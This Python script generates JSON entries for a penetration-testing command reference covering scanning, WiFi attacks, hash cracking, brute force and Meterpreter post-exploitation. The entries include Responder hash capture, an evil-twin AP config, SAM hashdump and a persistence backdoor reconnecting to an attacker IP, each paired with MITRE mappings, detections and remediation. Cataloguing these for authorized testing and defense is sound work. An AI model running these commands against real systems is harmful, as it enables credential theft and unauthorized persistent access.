#!/usr/bin/env python3
"""Batch 6 — targeting 300+. Focus on thin categories."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== VULNERABILITY ASSESSMENT (20) =====================
VA=[
e("openvas-scan","openvas","vulnerability_assessment",3,L,"gvm-cli --gmp-username admin --gmp-password pass socket --socketpath /run/gvmd/gvmd.sock --xml '<create_task>...'","OpenVAS Vulnerability Scan","Full vulnerability assessment using OpenVAS/Greenbone — enterprise-grade scanner.",{"gvm-cli":"GVM command line","create_task":"Create scan task"},"High: CVE-2021-44228 (Log4Shell) - CVSS 10.0\nMedium: CVE-2023-1234 - CVSS 6.5","Comprehensive vulnerability scanning with detailed CVE reporting.",["OpenVAS/GVM installed","Target accessible"],["T1595"],"Reconnaissance",["Vulnerability scan traffic patterns","Multiple exploit probes"],["Patch identified vulnerabilities","Prioritize by CVSS"],["Not updating NVT feeds before scanning"],["Nessus","Qualys","nuclei"],["https://www.greenbone.net"],["openvas","vulnerability","scanner","enterprise","cve"]),
e("nmap-vulners-scan","nmap","vulnerability_assessment",3,LWM,"nmap -sV --script vulners --script-args mincvss=7.0 -p <ports> <target>","CVE Lookup (High Severity)","Checks service versions against Vulners database — filters for CVSS 7.0+.",{"--script vulners":"Vulners CVE database","mincvss=7.0":"Only show high/critical"},"| vulners:\n|   CVE-2021-44228  10.0\n|   CVE-2023-22515  9.8","Quick high-severity CVE check without a full vulnerability scanner.",["Service versions detected (-sV)"],["T1595"],"Reconnaissance",["Version probing"],["Patch critical CVEs immediately"],["Not running -sV first"],["nuclei -severity critical,high","searchsploit"],["https://github.com/vulnersCom/nmap-vulners"],["cve","high-severity","vulners","quick-check"]),
e("searchsploit-nmap","searchsploit","vulnerability_assessment",3,L,"searchsploit --nmap scan_results.xml","SearchSploit from Nmap XML","Automatically searches ExploitDB for all services found in an Nmap XML scan.",{"--nmap":"Parse Nmap XML output"},"Apache 2.4.49 - Path Traversal\nOpenSSH 8.2 - Username Enumeration","Automatically find exploits for all discovered services in one command.",["Nmap XML output (-oX)","exploitdb installed"],["T1190"],"Initial Access",["N/A — local search"],["Patch services"],["Not saving nmap output as XML"],["nmap --script vulners"],["https://www.exploit-db.com"],["exploitdb","nmap","automated","matching"]),
e("nikto-ssl","nikto","vulnerability_assessment",3,L,"nikto -h https://<target> -ssl","Nikto HTTPS Scan","Scans HTTPS targets for vulnerabilities, misconfigurations, and outdated software.",{"-h":"Target","-ssl":"Force SSL/TLS"},"+ SSL Info: Subject: /CN=target.com\n+ /admin/: Admin panel found\n+ Outdated: Apache/2.4.49","Web vulnerability scan over HTTPS — checks SSL config too.",["HTTPS service running"],["T1595"],"Reconnaissance",["Nikto user-agent","Probe patterns"],["Update software","Remove sensitive paths"],["Forgetting -ssl flag for HTTPS"],["nuclei","testssl.sh"],["https://github.com/sullo/nikto"],["nikto","https","ssl","vulnerability"]),
e("wapiti-scan","wapiti","vulnerability_assessment",3,L,"wapiti -u http://<target>/ -f html -o report/","Wapiti Web Vulnerability Scanner","Black-box web vulnerability scanner — tests for XSS, SQLi, SSRF, XXE, and more.",{"-u":"Target URL","-f html":"Report format","-o":"Output directory"},"[*] Launching module sql\n[!] SQL Injection found in parameter 'id'\n[*] Launching module xss\n[!] XSS found in parameter 'search'","Automated web app vulnerability scanning with detailed HTML reports.",["Web application accessible"],["T1190"],"Initial Access",["High request volume","Malicious payloads in logs"],["Fix identified vulnerabilities","WAF"],["Not reviewing the HTML report"],["nuclei","zap","burp scanner"],["https://wapiti-scanner.github.io"],["wapiti","scanner","xss","sqli","automated"]),
]

# ===================== WIRELESS EXPANDED (15) =====================
WIRE=[
e("airmon-start","aircrack-ng","wireless",6,L,"airmon-ng start wlan0","Enable Monitor Mode","Puts wireless interface into monitor mode for packet capture.",{"start":"Enable monitor mode","wlan0":"Interface name"},"PHY     Interface   Driver\nphy0    wlan0mon    ath9k (monitor mode enabled)","Required first step for any wireless attack — enables raw packet capture.",["Compatible wireless adapter","Root privileges"],["T1040"],"Collection",["Interface mode change","Monitor mode detection by AP"],["Use 802.11w","WIDS deployment"],["Adapter doesn't support monitor mode"],["ip link set wlan0 down && iw wlan0 set monitor control"],["https://www.aircrack-ng.org/doku.php?id=airmon-ng"],["monitor-mode","wireless","setup","capture"]),
e("airodump-scan","aircrack-ng","wireless",6,L,"airodump-ng wlan0mon","Wireless Network Discovery","Scans all channels and displays nearby access points and connected clients.",{"wlan0mon":"Monitor mode interface"},"BSSID              CH  ENC   ESSID\nAA:BB:CC:DD:EE:FF  6   WPA2  CorpWiFi\n11:22:33:44:55:66  1   WPA2  GuestNet","Discover all nearby wireless networks — first step in wireless assessment.",["Monitor mode enabled"],["T1040"],"Discovery",["Monitor mode activity","Probe requests"],["Hide SSID (minimal protection)","Use WPA3"],["Not waiting long enough to see all networks"],["kismet","wifite --kill"],["https://www.aircrack-ng.org/doku.php?id=airodump-ng"],["wireless","discovery","networks","scan"]),
e("aireplay-deauth","aircrack-ng","wireless",6,L,"aireplay-ng --deauth 10 -a <AP_BSSID> -c <CLIENT_MAC> wlan0mon","Targeted Deauthentication","Sends deauth frames to disconnect a specific client — forces handshake recapture.",{"--deauth 10":"Send 10 deauth frames","-a":"AP BSSID","-c":"Client MAC"},"Sending DeAuth to station -- STMAC: [CC:DD:EE:FF:00:11]","Force client reconnection to capture WPA handshake.",["Monitor mode","Target AP and client MACs known"],["T1498"],"Impact",["Deauth frames in WIDS","Client disconnection events"],["802.11w (management frame protection)","WIDS"],["Deauthing wrong client","AP has 802.11w"],["mdk4","bettercap wifi.deauth"],["https://www.aircrack-ng.org/doku.php?id=aireplay-ng"],["deauth","wireless","handshake","force"]),
e("wifite-auto","wifite","wireless",6,L,"wifite --kill --dict /usr/share/wordlists/rockyou.txt","Automated WiFi Attack","Automated wireless attack tool — scans, captures handshakes, and cracks in one command.",{"--kill":"Kill interfering processes","--dict":"Wordlist for cracking"},"[+] Captured handshake for CorpWiFi\n[+] Cracking with rockyou.txt...\n[+] KEY FOUND: Summer2024!","Fully automated WiFi assessment — from scan to crack in one tool.",["Compatible adapter","Monitor mode capable"],["T1040","T1110"],"Credential Access",["Deauth frames","Handshake capture activity"],["WPA3","Strong passwords","802.1X"],["Adapter incompatible","Password not in wordlist"],["manual aircrack-ng workflow","bettercap"],["https://github.com/derv82/wifite2"],["automated","wifi","crack","handshake","all-in-one"]),
e("evil-twin","hostapd","wireless",6,L,"# Create evil twin AP:\nhostapd evil_twin.conf\n# evil_twin.conf:\ninterface=wlan1\nssid=CorpWiFi\nchannel=6","Evil Twin Attack Setup","Creates a rogue access point mimicking a legitimate network to capture credentials.",{"hostapd":"AP daemon","ssid=CorpWiFi":"Clone target SSID","channel=6":"Same channel as target"},"# Victims connect to fake AP\n# Capture credentials via captive portal","Create fake AP to intercept traffic or present phishing captive portal.",["Two wireless adapters","hostapd + dnsmasq"],["T1557"],"Credential Access",["Duplicate SSID detection","Unusual AP characteristics"],["802.1X enterprise auth","Certificate pinning","WIDS"],["Victims don't connect","Real AP signal stronger"],["fluxion (automated)","wifiphisher"],["https://w1.fi/hostapd/"],["evil-twin","rogue-ap","phishing","wireless","mitm"]),
]

# ===================== MORE PASSWORD (10) =====================
PW6=[
e("hashcat-md5","hashcat","password_attacks",6,LW,"hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule","Crack MD5 Hashes","Cracks MD5 hashes — common in web applications and older systems.",{"-m 0":"MD5 mode"},"5f4dcc3b5aa765d61d8327deb882cf99:password\nStatus: Cracked","Crack MD5 hashes from web app databases or file hashes.",["MD5 hashes","Wordlist"],["T1110.002"],"Credential Access",["N/A — offline"],["Use bcrypt/argon2 instead of MD5","Salt hashes"],["Wrong hash mode"],["john --format=raw-md5"],["https://hashcat.net/wiki"],["md5","cracking","web","database"]),
e("hashcat-sha256","hashcat","password_attacks",6,LW,"hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt","Crack SHA-256 Hashes","Cracks SHA-256 hashes.",{"-m 1400":"SHA-256 mode"},"Status: Cracked","Crack SHA-256 hashes from applications.",["SHA-256 hashes"],["T1110.002"],"Credential Access",["N/A — offline"],["Use key stretching (PBKDF2, bcrypt)"],["Confusing SHA-256 with SHA-512 mode"],["john --format=raw-sha256"],["https://hashcat.net/wiki"],["sha256","cracking","hash"]),
e("hashcat-bcrypt","hashcat","password_attacks",6,LW,"hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt","Crack bcrypt Hashes","Cracks bcrypt hashes — very slow due to intentional key stretching.",{"-m 3200":"bcrypt mode"},"$2a$10$...:password123\nStatus: Cracked (very slow)","Crack bcrypt hashes — expect very slow speeds (designed to be slow).",["bcrypt hashes","Patience (very slow)"],["T1110.002"],"Credential Access",["N/A — offline"],["Use high cost factor (12+)","Strong passwords"],["Expecting fast cracking (bcrypt is intentionally slow)"],["john --format=bcrypt"],["https://hashcat.net/wiki"],["bcrypt","slow","cracking","key-stretching"]),
e("hydra-ftp","hydra","password_attacks",5,L,"hydra -l anonymous -P passwords.txt ftp://<target>","FTP Brute-Force","Brute-forces FTP login credentials.",{"-l":"Username","ftp://":"FTP protocol"},"[21][ftp] host: target login: admin password: admin123","Brute-force FTP when anonymous access is disabled.",["FTP port 21 open"],["T1110.001"],"Credential Access",["Multiple failed FTP logins"],["Account lockout","Use SFTP","Strong passwords"],["Anonymous access already works"],["netexec ftp","medusa"],["https://github.com/vanhauser-thc/thc-hydra"],["ftp","brute-force","credentials"]),
e("hydra-smb","hydra","password_attacks",5,L,"hydra -l administrator -P passwords.txt smb://<target>","SMB Brute-Force","Brute-forces SMB/Windows login.",{"smb://":"SMB protocol"},"[445][smb] host: target login: administrator password: P@ss","Brute-force Windows SMB authentication.",["SMB port 445 open","No lockout"],["T1110.001"],"Credential Access",["Multiple failed SMB logins (Event 4625)"],["Account lockout","MFA","Strong passwords"],["Account lockout after 3 attempts"],["netexec smb","crackmapexec"],["https://github.com/vanhauser-thc/thc-hydra"],["smb","brute-force","windows","credentials"]),
e("responder-hash-relay","responder","password_attacks",5,L,"responder -I eth0 -v","Capture NTLM Hashes (Responder)","Poisons LLMNR/NBT-NS to capture NTLMv2 hashes for cracking or relay.",{"-I":"Interface","-v":"Verbose"},"[+] NTLMv2 Hash: CORP\\admin::CORP:hash...","Passively capture authentication hashes on the local network.",["Same network segment","Root privileges"],["T1557.001"],"Credential Access",["LLMNR/NBT-NS responses from non-server","Multiple poisoned responses"],["Disable LLMNR/NBT-NS","SMB signing"],["Wrong interface","No LLMNR traffic"],["Inveigh (Windows)","mitm6"],["https://github.com/lgandx/Responder"],["responder","ntlm","capture","poisoning","passive"]),
]

# ===================== MORE POSTEX (10) =====================
PX6=[
e("meterpreter-hashdump","metasploit","post_exploitation",6,LW,"meterpreter > hashdump","Meterpreter Hash Dump","Dumps local password hashes from a Meterpreter session.",{"hashdump":"Dump SAM hashes"},"Administrator:500:aad3b435...:fc525c96...:::\nGuest:501:aad3b435...:...:::","Quick hash dump from active Meterpreter session.",["Meterpreter session","SYSTEM privileges"],["T1003.002"],"Credential Access",["LSASS/SAM access"],["Credential Guard","LAPS"],["Not having SYSTEM (use getsystem first)"],["mimikatz","secretsdump"],["https://docs.metasploit.com"],["meterpreter","hashdump","sam","quick"]),
e("meterpreter-getsystem","metasploit","post_exploitation",6,W,"meterpreter > getsystem","Meterpreter Privilege Escalation","Attempts multiple techniques to escalate to SYSTEM from admin.",{"getsystem":"Try all privesc techniques"},"...got system via technique 1 (Named Pipe Impersonation)","Quick SYSTEM escalation from admin-level Meterpreter session.",["Admin-level Meterpreter session"],["T1134"],"Privilege Escalation",["Named pipe creation","Token manipulation"],["Restrict admin access","Monitor token usage"],["Not having admin first"],["PrintSpoofer","JuicyPotato"],["https://docs.metasploit.com"],["meterpreter","system","escalation","quick"]),
e("meterpreter-portfwd","metasploit","post_exploitation",6,LW,"meterpreter > portfwd add -l 3389 -p 3389 -r <internal_target>","Meterpreter Port Forward","Forwards a port through the Meterpreter session to access internal services.",{"portfwd add":"Add port forward","-l":"Local port","-p":"Remote port","-r":"Remote host"},"[*] Forward TCP relay created: 127.0.0.1:3389 -> 10.0.0.5:3389","Access internal services (RDP, databases) through compromised host.",["Active Meterpreter session"],["T1572"],"Command and Control",["Unusual port forwarding","Tunnel traffic patterns"],["Network segmentation","Monitor for tunneling"],["Session dies during forward"],["chisel","ssh -L","ligolo-ng"],["https://docs.metasploit.com"],["port-forward","meterpreter","pivot","internal"]),
e("meterpreter-persistence","metasploit","post_exploitation",6,W,"meterpreter > run persistence -U -i 30 -p 4444 -r <attacker_ip>","Meterpreter Persistence","Installs a persistent backdoor that reconnects every 30 seconds.",{"-U":"Run at user login","-i 30":"Reconnect interval","-p":"Port","-r":"Attacker IP"},"[*] Persistent agent installed as registry run key","Maintain access even after reboot — auto-reconnects to attacker.",["Meterpreter session"],["T1547.001"],"Persistence",["New registry Run key","Periodic outbound connections"],["Monitor registry changes","Application whitelisting","EDR"],["Gets detected by AV immediately"],["manual registry persistence","scheduled task"],["https://docs.metasploit.com"],["persistence","backdoor","registry","reconnect"]),
e("sharphound-custom","bloodhound","post_exploitation",6,W,"SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\\temp\\ --stealth","SharpHound Stealth Collection","Collects BloodHound data with stealth options — fewer queries, less detection.",{"-c All,GPOLocalGroup":"All data + GPO local groups","--stealth":"Reduce query volume"},"[*] Stealth mode: single-threaded, reduced queries\n[*] Zip: BloodHound_stealth.zip","Collect AD data while minimizing detection by EDR/SIEM.",["Domain user session"],["T1087"],"Discovery",["Reduced but still detectable LDAP queries"],["Monitor LDAP patterns","EDR rules for SharpHound"],["Still gets detected by advanced EDR"],["bloodhound-python (from Linux)"],["https://github.com/SpecterOps/BloodHound"],["bloodhound","stealth","collection","evasion"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 6...")
    save("bulk6_vuln_assessment.json",VA)
    save("bulk6_wireless.json",WIRE)
    save("bulk6_password.json",PW6)
    save("bulk6_postex.json",PX6)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
